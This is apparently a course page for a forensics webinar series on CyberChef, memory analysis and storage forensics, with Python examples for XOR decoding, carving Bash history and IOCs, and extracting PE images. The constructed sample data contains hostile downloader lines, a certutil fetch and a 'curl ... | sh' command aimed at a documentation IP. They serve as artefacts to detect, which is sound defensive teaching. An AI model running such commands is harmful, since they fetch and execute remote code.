IT Forensics for System Administrators - Second Part

This second part focuses on the analysis phase of the forensic process, using open-source tools to dissect obfuscated or encoded pieces of information, search disk and memory images for indicators of compromise (IOCs), and build super-timelines.

Session 1: CyberChef

Since its first release in 2017 CyberChef - described as "The Cyber Swiss Army Knife" - has quickly become one of the go-to tools for many IT security practitioners. CyberChef is a free, browser-based, open-source tool that supports hundreds of different "cyber operations" such as encoding, encrypting, compressing, converting and analysing data. It is especially useful for malware analysts as well as forensic investigators. This webinar/live demo will demonstrate many of CyberChef's powerful capabilities as well as some of its less well-known operations.
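As an added illustration of the kind of recipe the session builds interactively (not code from the session or from the CyberChef project), the following Python reproduces a two-step CyberChef recipe, "From Base64" followed by "XOR Brute Force" with a single-byte key, ranking the 256 candidate keys by an English letter-frequency score. The sample command line and the key 0x5A are constructed for this demo; the certutil line is a typical downloader pattern, not an artefact from any real case.

```python
import base64
from typing import Tuple

# Rough English letter frequencies (percent). Space is the most common byte in
# text, so it gets the highest weight. Bytes not in the table score zero, which
# is what separates the right key from keys that merely yield printable junk.
_FREQ = {
    'a': 8.2, 'b': 1.5, 'c': 2.8, 'd': 4.3, 'e': 12.7, 'f': 2.2, 'g': 2.0,
    'h': 6.1, 'i': 7.0, 'j': 0.2, 'k': 0.8, 'l': 4.0, 'm': 2.4, 'n': 6.7,
    'o': 7.5, 'p': 1.9, 'q': 0.1, 'r': 6.0, 's': 6.3, 't': 9.1, 'u': 2.8,
    'v': 1.0, 'w': 2.4, 'x': 0.2, 'y': 2.0, 'z': 0.1, ' ': 13.0,
}


def english_score(data: bytes) -> float:
    """Sum of letter-frequency weights; higher means 'looks more like English'."""
    return sum(_FREQ.get(chr(b).lower(), 0.0) for b in data)


def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (CyberChef 'XOR' with a 1-byte key)."""
    return bytes(b ^ key for b in data)


def brute_force_xor(data: bytes) -> Tuple[int, bytes]:
    """Try all 256 single-byte keys and return (best key, decoded bytes)."""
    best_key, best_score = 0, float("-inf")
    for key in range(256):
        score = english_score(xor_single(data, key))
        if score > best_score:
            best_key, best_score = key, score
    return best_key, xor_single(data, best_key)


def recipe_from_base64_xor_bruteforce(blob: str) -> Tuple[int, bytes]:
    """Equivalent of the CyberChef recipe: From Base64 -> XOR Brute Force."""
    raw = base64.b64decode(blob, validate=True)
    return brute_force_xor(raw)


# Constructed sample (not from any real incident): a command line XOR-ed with
# a single byte and base64-encoded, the way a dropper script might carry it.
SAMPLE_PLAINTEXT = (
    b"certutil -urlcache -split -f http://198.51.100.7/update.dat "
    b"C:\\Windows\\Temp\\update.dat"
)
SAMPLE_KEY = 0x5A
SAMPLE_BLOB = base64.b64encode(xor_single(SAMPLE_PLAINTEXT, SAMPLE_KEY)).decode()

if __name__ == "__main__":
    key, plain = recipe_from_base64_xor_bruteforce(SAMPLE_BLOB)
    print(f"key=0x{key:02x} plaintext={plain.decode('latin-1')}")
```

The scoring is deliberately case-insensitive and ignores digits and punctuation, so a key that merely flips case (XOR 0x20) or shifts letters by one (XOR 0x01) still loses on the spaces it destroys; for multi-byte keys the same idea applies per key position after the key length has been guessed.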

session 1 recording

session 1 presentation

Session 2: Memory Analysis Basics - First Steps

Having obtained an image of the memory of a compromised system, what do you do with it? This part of the forensic process is called analysis, and this webinar will go through the first steps of analysing a memory image: looking into processes, network connections and temporary filesystems, as well as some operating-system-specific artefacts such as the Windows registry or the Linux Bash history.
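Two of the first-step tasks named above, pulling Bash history out of a Linux memory image and searching an image for IOCs, can be done without a full framework. The following Python is an added example (not the session's own material, and not a Volatility plugin): it carves timestamped Bash history entries by looking for the "#<epoch>" strings Bash keeps for each history entry, and scans for known IOC strings plus anything shaped like an IPv4 address or URL. One simplification is assumed and labelled in the code: the command text is taken to be the NUL-terminated printable string allocated directly after its timestamp, which is common on the heap but not guaranteed. The image bytes are constructed for the demo.

```python
import mmap
import re
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Bash stores each history entry's timestamp as its own "#<epoch seconds>"
# string (the marker memory-forensics tools search for when timestamps are on).
# Assumption in this demo: the command text is the printable NUL-terminated
# string right after the timestamp. Real heaps usually, not always, look so.
_BASH_TS = re.compile(rb"#(\d{10})\x00([\x20-\x7e]{1,512})\x00")

_IOC_PATTERNS = {
    "ipv4": re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "url": re.compile(rb"https?://[\x21-\x7e]{4,256}"),
}


def carve_bash_history(image) -> List[Tuple[int, str, str]]:
    """Return (offset, ISO-8601 UTC timestamp, command) for each carved entry."""
    entries = []
    for m in _BASH_TS.finditer(image):
        ts = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
        entries.append((m.start(), ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
                        m.group(2).decode("ascii")))
    return entries


def find_iocs(image, known: List[bytes]) -> Dict[str, List[Tuple[int, bytes]]]:
    """Locate known IOC strings and any IPv4/URL-looking strings, with offsets."""
    hits: Dict[str, List[Tuple[int, bytes]]] = {}
    for ioc in known:
        hits[ioc.decode("latin-1")] = [
            (m.start(), ioc) for m in re.finditer(re.escape(ioc), image)
        ]
    for name, pat in _IOC_PATTERNS.items():
        hits[name] = [(m.start(), m.group(0)) for m in pat.finditer(image)]
    return hits


def scan_file(path: str, known: List[bytes]):
    """Scan a real (multi-GB) image without reading it into RAM: re accepts mmap."""
    with open(path, "rb") as fh, mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as mm:
        return carve_bash_history(mm), find_iocs(mm, known)


# Constructed stand-in for a memory image: two timestamped history entries and
# some unrelated heap data. Addresses are from documentation/private ranges.
CONSTRUCTED_IMAGE = (
    b"\x00" * 64
    + b"#1700000000\x00ls -la /tmp\x00"
    + b"\x00" * 17
    + b"#1700000042\x00curl -s http://198.51.100.7/x.sh | sh\x00"
    + b"\x00\x00unrelated heap data 10.0.0.5\x00"
    + b"\x00" * 32
)

if __name__ == "__main__":
    for off, when, cmd in carve_bash_history(CONSTRUCTED_IMAGE):
        print(f"0x{off:08x} {when} {cmd}")
    for name, found in find_iocs(CONSTRUCTED_IMAGE, [b"198.51.100.7"]).items():
        print(name, [(hex(o), v.decode('latin-1')) for o, v in found])
```

On a real image the offsets are physical offsets; mapping them back to a process (and confirming that the carved string really belongs to a bash heap rather than, say, a terminal scrollback buffer) is exactly the step a framework such as the one demonstrated in the session performs for you.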

session 2 recording

session 2 presentation

Session 3: Advanced Memory Analysis - Dealing with Malicious Code

Malware that is compressed or encrypted on disk is usually unpacked and in cleartext in memory. Likewise, rootkits that conceal adversary activity can be found with relative ease in the memory image of a compromised system. This webinar will show techniques for locating malware that uses common mechanisms such as DLL injection, malicious kernel modules, or system call table manipulation. Concluding the module, ways to extract suspicious code segments for further analysis are also shown.
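To make the last step concrete, here is an added example (not code from the session) of extracting code from a memory image: it walks the image looking for PE headers at page boundaries, validates the DOS/NT signatures and optional-header magic, lists the sections, and carves SizeOfImage bytes so the unpacked, in-memory copy of an executable or injected DLL can be handed to a disassembler. The carver also accepts a non-page-aligned scan for dumps where images are not page-aligned. The PE header in the sample is constructed for the demo (valid structure, no real code).

```python
import struct
from typing import Dict, List, Optional

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\x00\x00"
IMAGE_FILE_DLL = 0x2000
PAGE = 0x1000


def parse_pe_at(image: bytes, off: int) -> Optional[Dict]:
    """Validate a PE image starting at `off` and summarise it, else return None."""
    if image[off:off + 2] != IMAGE_DOS_SIGNATURE or off + 0x40 > len(image):
        return None
    (e_lfanew,) = struct.unpack_from("<I", image, off + 0x3C)
    nt = off + e_lfanew
    if e_lfanew > PAGE or nt + 24 > len(image) or image[nt:nt + 4] != IMAGE_NT_SIGNATURE:
        return None
    # COFF file header follows the 4-byte signature.
    machine, nsect, _ts, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", image, nt + 4)
    opt = nt + 24
    if opt + 64 > len(image) or nsect == 0 or nsect > 96:
        return None
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):          # PE32 / PE32+
        return None
    # SizeOfImage / SizeOfHeaders sit at the same offsets in PE32 and PE32+.
    size_of_image, size_of_headers = struct.unpack_from("<II", image, opt + 56)
    sec = opt + opt_size
    if sec + 40 * nsect > len(image):
        return None
    sections = []
    for i in range(nsect):
        name, vsize, vaddr = struct.unpack_from("<8sII", image, sec + 40 * i)
        sections.append((name.rstrip(b"\x00").decode("latin-1"), vaddr, vsize))
    return {
        "offset": off, "machine": machine, "pe32plus": magic == 0x20B,
        "is_dll": bool(chars & IMAGE_FILE_DLL), "size_of_image": size_of_image,
        "size_of_headers": size_of_headers, "sections": sections,
    }


def carve_pe_images(image: bytes, page_aligned: bool = True) -> List[Dict]:
    """Find every valid PE header; mapped images start on page boundaries."""
    found = []
    pos = image.find(IMAGE_DOS_SIGNATURE)
    while pos != -1:
        if not page_aligned or pos % PAGE == 0:
            info = parse_pe_at(image, pos)
            if info:
                found.append(info)
        pos = image.find(IMAGE_DOS_SIGNATURE, pos + 1)
    return found


def dump_pe(image: bytes, info: Dict) -> bytes:
    """Memory-layout copy of the image (sections at their virtual addresses)."""
    return image[info["offset"]:info["offset"] + info["size_of_image"]]


def build_sample_pe() -> bytes:
    """Constructed minimal PE32+ DLL header with two sections (no real code)."""
    dos = IMAGE_DOS_SIGNATURE + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)
    # x64, 2 sections, SizeOfOptionalHeader 240, EXECUTABLE|LARGE_ADDRESS_AWARE|DLL
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<II", opt, 56, 0x3000, 0x400)   # SizeOfImage, SizeOfHeaders
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x800, 0x1000, 0x800, 0x400, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rdata", 0x200, 0x2000, 0x200, 0xC00, 0, 0, 0, 0, 0x40000040)
    hdr = dos + IMAGE_NT_SIGNATURE + coff + bytes(opt) + sec
    return hdr + b"\x00" * (0x3000 - len(hdr))


# Constructed stand-in for a memory image: a stray "MZ" inside unrelated data,
# then the sample PE mapped at page offset 0x1000.
_filler = bytearray(PAGE)
_filler[0x200:0x202] = IMAGE_DOS_SIGNATURE
CONSTRUCTED_IMAGE = bytes(_filler) + build_sample_pe() + b"\x00" * PAGE

if __name__ == "__main__":
    for info in carve_pe_images(CONSTRUCTED_IMAGE):
        print(f"PE at 0x{info['offset']:x} machine=0x{info['machine']:x} "
              f"dll={info['is_dll']} sections={info['sections']}")
        print("carved", len(dump_pe(CONSTRUCTED_IMAGE, info)), "bytes")
```

What comes out is the image as it was mapped, so section data sits at RVAs rather than file offsets; before loading it into a disassembler, either set each section's PointerToRawData equal to its VirtualAddress or use a tool that understands memory-layout dumps. The stray "MZ" in the filler shows why the signature alone is not enough: it fails the e_lfanew/NT-signature check and is discarded.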

session 3 recording

session 3 presentation

Session 4: Persistent Storage Forensics I - Basics and First Steps

In this session, we will discuss the basic concepts of persistent storage forensics. Furthermore, some approaches with easy-to-use basic tools will be presented and demonstrated.

session 4 recording

session 4 presentation

Session 5: Persistent Storage Forensics II - Advanced Approaches

In this session, more advanced analysis methods and tools will be discussed. Furthermore, these methods and tools will be demonstrated in practice with selected case samples.

session 5 recording

session 5 presentation